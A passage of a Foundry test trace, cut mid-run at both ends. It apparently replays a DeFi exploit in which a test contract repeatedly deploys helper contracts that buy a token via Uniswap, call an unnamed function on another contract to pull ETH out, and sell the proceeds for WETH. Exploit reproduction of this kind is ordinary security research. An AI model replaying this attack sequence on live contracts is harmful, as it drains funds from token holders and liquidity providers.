    │   │   │   │   │   @ 0xfba5f2a1d830a190559ca7c469880ec8ec6153f76bb7199166474d995a756354: 0 → 0x0000000000000000000000000000000000000000000000000000000065e5eba3
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(Money: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a]) [staticcall]
    │   │   │   │   └─ ← [Return] 3603896601443845025773037361 [3.603e27]
    │   │   │   ├─ [28771] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3603896601443845025773037361 [3.603e27])
    │   │   │   │   ├─ emit Transfer(from: Money: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3603896601443845025773037361 [3.603e27])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000ba512ca3c242f73254aa731
    │   │   │   │   │   @ 0x3d76c6985e66b7484bab90b51b1d44f6e45a807dc0aeaaa0ca2d3a6a42e6df46: 0x00000000000000000000000000000000000000000ba512ca3c242f73254aa731 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [41] ContractTest::fallback{value: 3677332683585103419}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 31: 0 → 0x00000000000000000000007109709ecfa91a80626ff3989d68f67f5b1dd12d01
    │   │   │   │   @ 32: 0 → 0x0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
    │   │   │   │   @ 33: 0 → 0x0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b7676
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 35: 0 → 0x00000000000000000000000055d398326f99059ff775485246999027b3197955
    │   │   │   │   @ 37: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   @ 36: 0 → 0x000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2
    │   │   │   │   @ 34: 0 → 0x0000000000000000000000009700204d77a67a18ea8f1b47275897b21e5efa97
    │   │   │   │   @ 0x3c72b19ccd66922f145216e0475d8a4e01a991d43ea215cf51becd2813e8515f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   @ 0x30543003f4c3d50f45b48460271f5046363b61f46fb5bc4ab9cc52c1542f34c3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   @ 0: 2 → 1
    │   │   │   └─ ← [Return] 8811 bytes of code
    │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 3603896601443845025773037361 [3.603e27]
    │   │   ├─ [3266] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xfffffffffffffffffffffffffffffffffffffffff43ffcdceafa1351cca019d5 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [38847] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokens(3603896601443845025773037361 [3.603e27], 0, [0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1708703003 [1.708e9])
    │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 1023082535857576417855422023 [1.023e27], 256006650237432021328 [2.56e20], 1708702883 [1.708e9]
    │   │   │   ├─ [13739] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, 3603896601443845025773037361 [3.603e27])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, value: 3603896601443845025773037361 [3.603e27])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665636960142856140162887356602574 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffff45aed35c3dbd08cdab558ce
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000ba512ca3c242f73254aa731 → 0
    │   │   │   │   │   @ 0xbda5c3b0e636d87e9689db6e66a16c5dea6d4bc5a1a7a9f0e242006b64cce914: 0x0000000000000000000000000000000000000000034e462766831d9fda423e47 → 0x00000000000000000000000000000000000000000ef358f1a2a74d12ff8ce578
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [16855] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::swap(0, 199267821782816979873 [1.992e20], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199267821782816979873 [1.992e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199267821782816979873 [1.992e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x7bef77c31785d26b528aabfd5085ccf57f954814dd85cc8f2e0ddaf5453e36c1: 0x00000000000000000000000000000000000000000000000de0ce540273cec150 → 0x0000000000000000000000000000000000000000000000031368cfdd4127c5af
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000002072b66cad65448c2a → 0x00000000000000000000000000000000000000000000002b401bf0d297eb87cb
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4626979137301421443628459384 [4.626e27]
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   └─ ← [Return] 56738828454615041455 [5.673e19]
    │   │   │   │   ├─ emit Sync(reserve0: 4626979137301421443628459384 [4.626e27], reserve1: 56738828454615041455 [5.673e19])
    │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 3603896601443845025773037361 [3.603e27], amount1In: 0, amount0Out: 0, amount1Out: 199267821782816979873 [1.992e20], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x65d8bca300000000000de0ce540273cec1500000034e462766831d9fda423e47 → 0x65d8bca30000000000031368cfdd4127c5af00000ef358f1a2a74d12ff8ce578
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [3603896601443845025773037361 [3.603e27], 199267821782816979873 [1.992e20]]
    │   │   ├─ [2305350] → new Money@0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9
    │   │   │   ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: Money: [0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xe7f345b71788af928cee0e907cb1cff0e1a22a11b99b9269acfba2e5b723b81e: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [89795] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactETHForTokens{value: 199900000000000000000}(0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676], Money: [0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9], 1708702883 [1.708e9])
    │   │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4626979137301421443628459384 [4.626e27], 56738828454615041455 [5.673e19], 1708702883 [1.708e9]
    │   │   │   │   ├─ [21974] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::deposit{value: 199900000000000000000}()
    │   │   │   │   │   ├─ emit Deposit(dst: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x00000000000000000000000000000000000000000000000ad62b76e268960000
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0xC2C701110dE2b9503E98619d9c9e3017877b0f72, 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, to: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, value: 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x7bef77c31785d26b528aabfd5085ccf57f954814dd85cc8f2e0ddaf5453e36c1: 0x0000000000000000000000000000000000000000000000031368cfdd4127c5af → 0x00000000000000000000000000000000000000000000000de99446bfa9bdc5af
    │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x00000000000000000000000000000000000000000000000ad62b76e268960000 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [49790] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::swap(3601630484074133748489531695 [3.601e27], 0, Money: [0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9], 0x)
    │   │   │   │   │   ├─ [36197] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transfer(Money: [0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9], 3601630484074133748489531695 [3.601e27])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, to: Money: [0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9], value: 3601630484074133748489531695 [3.601e27])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 14: 16353 → 16354
    │   │   │   │   │   │   │   @ 0x82fa90e26d934e00bcccf43631fcd41813cd95e22aa87aeb76b957c96ae9c7ec: 0 → 0x00000000000000000000000000000000000000000ba332ebc4230b706866312f
    │   │   │   │   │   │   │   @ 0xbda5c3b0e636d87e9689db6e66a16c5dea6d4bc5a1a7a9f0e242006b64cce914: 0x00000000000000000000000000000000000000000ef358f1a2a74d12ff8ce578 → 0x000000000000000000000000000000000000000003502605de8441a29726b449
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1025348653227287695138927689 [1.025e27]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 256638828454615041455 [2.566e20]
    │   │   │   │   │   ├─ emit Sync(reserve0: 1025348653227287695138927689 [1.025e27], reserve1: 256638828454615041455 [2.566e20])
    │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 199900000000000000000 [1.999e20], amount0Out: 3601630484074133748489531695 [3.601e27], amount1Out: 0, to: Money: [0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x65d8bca30000000000031368cfdd4127c5af00000ef358f1a2a74d12ff8ce578 → 0x65d8bca300000000000de99446bfa9bdc5af000003502605de8441a29726b449
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [199900000000000000000 [1.999e20], 3601630484074133748489531695 [3.601e27]]
    │   │   │   ├─ [25266] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::approve(0x9700204D77A67A18eA8F1B47275897b21e5eFA97, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: Money: [0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9], spender: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xfa4dbde8930492c126ca15774a4455a93fcc2b6808151b66feb5877409318c0e: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [164796] 0x9700204D77A67A18eA8F1B47275897b21e5eFA97::72c4cff6{value: 20000000000000000}(0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b76760000000000000000000000000000000000000000001908f29f1e5e61dde00000)
    │   │   │   │   ├─ [12130] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transferFrom(Money: [0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9], 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, 30265400000000000000000000 [3.026e25])
    │   │   │   │   │   ├─ emit Transfer(from: Money: [0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9], to: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 30265400000000000000000000 [3.026e25])
    │   │   │   │   │   ├─ emit Approval(owner: Money: [0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9], spender: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 115792089237316195423570985008687907853269984665640533774057584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x82fa90e26d934e00bcccf43631fcd41813cd95e22aa87aeb76b957c96ae9c7ec: 0x00000000000000000000000000000000000000000ba332ebc4230b706866312f → 0x00000000000000000000000000000000000000000b8a29f92504ad0e8a86312f
    │   │   │   │   │   │   @ 0xfa4dbde8930492c126ca15774a4455a93fcc2b6808151b66feb5877409318c0e: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffe6f70d60e1a19e221fffff
    │   │   │   │   │   │   @ 0xf2f990490f98f333693ac7d75623d20de79f35ab79b3d154d003025f90e2b764: 0x000000000000000000000000000000000000000001016e4ba026bd2d99a00000 → 0x0000000000000000000000000000000000000000011a773e3f451b8f77800000
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [564] 0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f::getPair(0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72
    │   │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 1025348653227287695138927689 [1.025e27], 256638828454615041455 [2.566e20], 1708702883 [1.708e9]
    │   │   │   │   ├─ [381] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676
    │   │   │   │   ├─ [0] Money::fallback{value: 3598245794515671336}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xd099e4631430737f2a77586e1a865926d23f406dbe01efd73564f4d11195c45b: 0 → 0x0000000000000000000000000000000000000000000000000000000065d8bca3
    │   │   │   │   │   @ 0xd099e4631430737f2a77586e1a865926d23f406dbe01efd73564f4d11195c459: 0 → 0x00000000000000000000000000000000000000000000000034905ad3bfd78646
    │   │   │   │   │   @ 2: 12 → 13
    │   │   │   │   │   @ 0x405787fa12a823e0f2b7631cc41b3ba8828b3321ca811111fa75cd3aa3bb5ada: 0 → 0x0000000000000000000000005991a2df15a8f6a256d3ec51e99254cd3fb576a9
    │   │   │   │   │   @ 0xd099e4631430737f2a77586e1a865926d23f406dbe01efd73564f4d11195c457: 0 → 0x0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b7676
    │   │   │   │   │   @ 0xd099e4631430737f2a77586e1a865926d23f406dbe01efd73564f4d11195c45a: 0 → 0x0000000000000000000000000000000000000000000000000000000065e5eba3
    │   │   │   │   │   @ 0xfa4dbde8930492c126ca15774a4455a93fcc2b6808151b66feb5877409318c0e: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffe6f70d60e1a19e221fffff
    │   │   │   │   │   @ 0xd099e4631430737f2a77586e1a865926d23f406dbe01efd73564f4d11195c458: 0 → 0x0000000000000000000000000000000000000000001908f29f1e5e61dde00000
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(Money: [0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9]) [staticcall]
    │   │   │   │   └─ ← [Return] 3571365084074133748489531695 [3.571e27]
    │   │   │   ├─ [28771] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3571365084074133748489531695 [3.571e27])
    │   │   │   │   ├─ emit Transfer(from: Money: [0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3571365084074133748489531695 [3.571e27])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000b8a29f92504ad0e8a86312f
    │   │   │   │   │   @ 0x82fa90e26d934e00bcccf43631fcd41813cd95e22aa87aeb76b957c96ae9c7ec: 0x00000000000000000000000000000000000000000b8a29f92504ad0e8a86312f → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [41] ContractTest::fallback{value: 3678245794515671336}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 37: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   @ 32: 0 → 0x0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
    │   │   │   │   @ 34: 0 → 0x0000000000000000000000009700204d77a67a18ea8f1b47275897b21e5efa97
    │   │   │   │   @ 0xe7f345b71788af928cee0e907cb1cff0e1a22a11b99b9269acfba2e5b723b81e: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   @ 0xfa4dbde8930492c126ca15774a4455a93fcc2b6808151b66feb5877409318c0e: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   @ 35: 0 → 0x00000000000000000000000055d398326f99059ff775485246999027b3197955
    │   │   │   │   @ 0: 2 → 1
    │   │   │   │   @ 36: 0 → 0x000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 31: 0 → 0x00000000000000000000007109709ecfa91a80626ff3989d68f67f5b1dd12d01
    │   │   │   │   @ 33: 0 → 0x0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b7676
    │   │   │   └─ ← [Return] 8811 bytes of code
    │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 3571365084074133748489531695 [3.571e27]
    │   │   ├─ [3266] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xfffffffffffffffffffffffffffffffffffffffff45aed35c3dbd08cdab558ce → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [38847] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokens(3571365084074133748489531695 [3.571e27], 0, [0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1708703003 [1.708e9])
    │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 1025348653227287695138927689 [1.025e27], 256638828454615041455 [2.566e20], 1708702883 [1.708e9]
    │   │   │   ├─ [13739] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, 3571365084074133748489531695 [3.571e27])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, value: 3571365084074133748489531695 [3.571e27])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665636992674373509874164640108240 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000b8a29f92504ad0e8a86312f → 0
    │   │   │   │   │   @ 0xbda5c3b0e636d87e9689db6e66a16c5dea6d4bc5a1a7a9f0e242006b64cce914: 0x000000000000000000000000000000000000000003502605de8441a29726b449 → 0x00000000000000000000000000000000000000000eda4fff0388eeb121ace578
    │   │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffff475d606dafb52f17579ced0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [16855] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::swap(0, 199258911825536199664 [1.992e20], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199258911825536199664 [1.992e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199258911825536199664 [1.992e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x7bef77c31785d26b528aabfd5085ccf57f954814dd85cc8f2e0ddaf5453e36c1: 0x00000000000000000000000000000000000000000000000de99446bfa9bdc5af → 0x0000000000000000000000000000000000000000000000031c4e6a298dc619bf
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000002b401bf0d297eb87cb → 0x0000000000000000000000000000000000000000000000360d61cd68b3e333bb
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4596713737301421443628459384 [4.596e27]
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   └─ ← [Return] 57379916629078841791 [5.737e19]
    │   │   │   │   ├─ emit Sync(reserve0: 4596713737301421443628459384 [4.596e27], reserve1: 57379916629078841791 [5.737e19])
    │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 3571365084074133748489531695 [3.571e27], amount1In: 0, amount0Out: 0, amount1Out: 199258911825536199664 [1.992e20], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x65d8bca300000000000de99446bfa9bdc5af000003502605de8441a29726b449 → 0x65d8bca30000000000031c4e6a298dc619bf00000eda4fff0388eeb121ace578
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [3571365084074133748489531695 [3.571e27], 199258911825536199664 [1.992e20]]
    │   │   ├─ [2165974] → new Money@0xc7183455a4C133Ae270771860664b6B7ec320bB1
    │   │   │   ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: Money: [0xc7183455a4C133Ae270771860664b6B7ec320bB1], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc81bef5f06b6cad6ab4e99e6402b57acf7dfbb75ae7de3271bfc8b0196f44d63: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [89795] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactETHForTokens{value: 199900000000000000000}(0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676], Money: [0xc7183455a4C133Ae270771860664b6B7ec320bB1], 1708702883 [1.708e9])
    │   │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4596713737301421443628459384 [4.596e27], 57379916629078841791 [5.737e19], 1708702883 [1.708e9]
    │   │   │   │   ├─ [21974] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::deposit{value: 199900000000000000000}()
    │   │   │   │   │   ├─ emit Deposit(dst: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─  storage changes:
